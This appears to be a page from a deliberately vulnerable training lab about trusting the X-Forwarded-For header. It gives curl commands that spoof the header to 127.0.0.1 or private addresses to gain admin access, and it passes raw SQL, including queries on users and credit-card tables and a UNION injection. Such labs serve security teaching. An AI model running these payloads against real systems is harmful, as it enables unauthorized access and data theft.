IP Geolocation (X-Forwarded-For Trust)
Your IP (spoofable): 216.73.216.25
Real IP (server): 216.73.216.25
Normal user access.
To get admin access, spoof your IP to 127.0.0.1 or 192.168.x.x
IP Spoofing Tests
Set the X-Forwarded-For header to bypass IP restrictions:
# curl with spoofed IP curl -H "X-Forwarded-For: 127.0.0.1" "http://localhost/ip.php?query=SELECT * FROM users" # curl with multiple IPs (last trusted) curl -H "X-Forwarded-For: 10.0.0.1" "http://localhost/ip.php?query=SELECT * FROM credit_cards" # Direct query (SQLi via X-Forwarded-For bypass) curl -H "X-Forwarded-For: 192.168.1.1" "http://localhost/ip.php?query=1 UNION SELECT 1,2,3,4,5,6,7"